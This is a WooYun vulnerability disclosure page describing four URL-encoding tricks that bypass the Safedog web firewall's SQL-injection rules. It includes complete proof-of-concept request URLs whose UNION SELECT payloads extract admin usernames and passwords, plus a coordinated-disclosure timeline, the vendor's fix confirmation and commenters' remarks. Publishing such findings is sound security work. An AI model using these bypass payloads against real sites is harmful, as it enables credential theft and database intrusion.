当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169906

漏洞标题:网站安全狗最新版(V3.5.12047)SQL注入防护规则可被四种姿势完美绕过

相关厂商:安全狗

漏洞作者: HackBraid

提交时间:2016-01-14 16:36

修复时间:2016-04-11 16:08

公开时间:2016-04-11 16:08

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-14: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-03-10: 细节向核心白帽子及相关领域专家公开
2016-03-20: 细节向普通白帽子公开
2016-03-30: 细节向实习白帽子公开
2016-04-11: 细节向公众公开

简要描述:

http://www.wooyun.org/bugs/wooyun-2016-0169777的高危变种,四种姿势可变化出无限种绕过方法~
Fuzz大法好!

详细说明:

00# 测试版本
开启URL地址全检测,网站安全狗版本也是最新的

anquangou.png


01# 四种姿势

-%-%2b
-%-%00
-%-%20
-%-%7c


以姿势-%-%2b为例,发现Fuzzing到16W+的payload时终于可以绕过,后续给出获取任意数据的漏洞证明

zishi1.png

漏洞证明:

姿势一:-%-%2b
获取管理员密码的POC:

**.**.**.**/select.php?inject_string=-%-%2b%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


mima.png


姿势二:-%-%00
获取管理员密码的POC:

**.**.**.**/select.php?inject_string=-%-%00%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


zishi2.png


姿势三:-%-%20
获取管理员密码的POC:

**.**.**.**/select.php?inject_string=-%-%20%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


zishi3.png


姿势四:-%-%7c
获取管理员密码的POC:

**.**.**.**/select.php?inject_string=-%-%7c%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


zishi4.png


只要有上述字符即可,前后随意加字母,以W**.**.**.**为例

9.136/select.php?inject_string=WooY**.**.**.**-%-%7CWooY**.**.**.**%27+union+select%20GROUP_CONCAT(DISTINCT%20username,0x5f,password)%20from%20admin%23+&sanitize_quotes=none&blacklist_level=none&blacklist_keywords=&query_results=all_rows&error_level=verbose&location=where_string&submit=%D7%A2%C9%E4%21


perfect.png


修复方案:

限制变种~

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-01-15 09:09

厂商回复:

非常感谢,修复已完成。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-01-14 16:37 | 奶嘴 ( 普通白帽子 | Rank:258 漏洞数:70 | 16岁的毛孩有些厂商故意加你好友,和你聊...)

    前排

  2. 2016-01-14 16:41 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)

    支持表哥。

  3. 2016-01-14 16:44 | 带我玩 ( 路人 | Rank:14 漏洞数:8 | 带我玩)

    支持表哥。

  4. 2016-01-14 16:50 | 小葵 ( 实习白帽子 | Rank:84 漏洞数:11 | 我们是害虫,我们是害虫!)

    还让不让狗,好好过年了... 完美绕过都出来了 啊啊啊啊

  5. 2016-01-14 17:20 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    又来让明年日站难度成倍增加了。。。

  6. 2016-01-14 19:09 | Aasron ( 普通白帽子 | Rank:408 漏洞数:93 | raw_input("你知道我要输入什么?"))

    全都交出去了,看来得找新绕过姿势了

  7. 2016-01-14 19:41 | Yosef ( 实习白帽子 | Rank:63 漏洞数:17 | 苦逼程序猿一枚)

    前排占座

  8. 2016-01-14 23:48 | 从容 ( 普通白帽子 | Rank:311 漏洞数:88 | Enjoy Hacking Just Because It's Fun | ...)

    支持表哥。

  9. 2016-01-15 10:11 | fuzz-ing ( 普通白帽子 | Rank:178 漏洞数:45 | 其实一开始要我挖洞我是拒绝的,因为不能你...)

    @无名 说的好像不发出来就能日到似的。。

  10. 2016-01-15 10:17 | chinakid ( 实习白帽子 | Rank:38 漏洞数:13 | 茉莉QQ12237347)

    全都交出去了,看来得找新绕过姿势了

  11. 2016-01-15 10:53 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    @fuzz-ing 说的好像不发出来就不能日到似的。

  12. 2016-01-18 14:03 | sword2 ( 实习白帽子 | Rank:35 漏洞数:7 | 姿势很重要。)

    阿西吧。日站的姿势又少一种了。

  13. 2016-01-18 17:51 | 萨瓦迪卡 ( 普通白帽子 | Rank:128 漏洞数:21 | 黑太子)

    漂亮 坐等公开

  14. 2016-02-02 03:03 | %230CC ( 路人 | Rank:6 漏洞数:2 | 溜溜)

    @sword2 是多了2种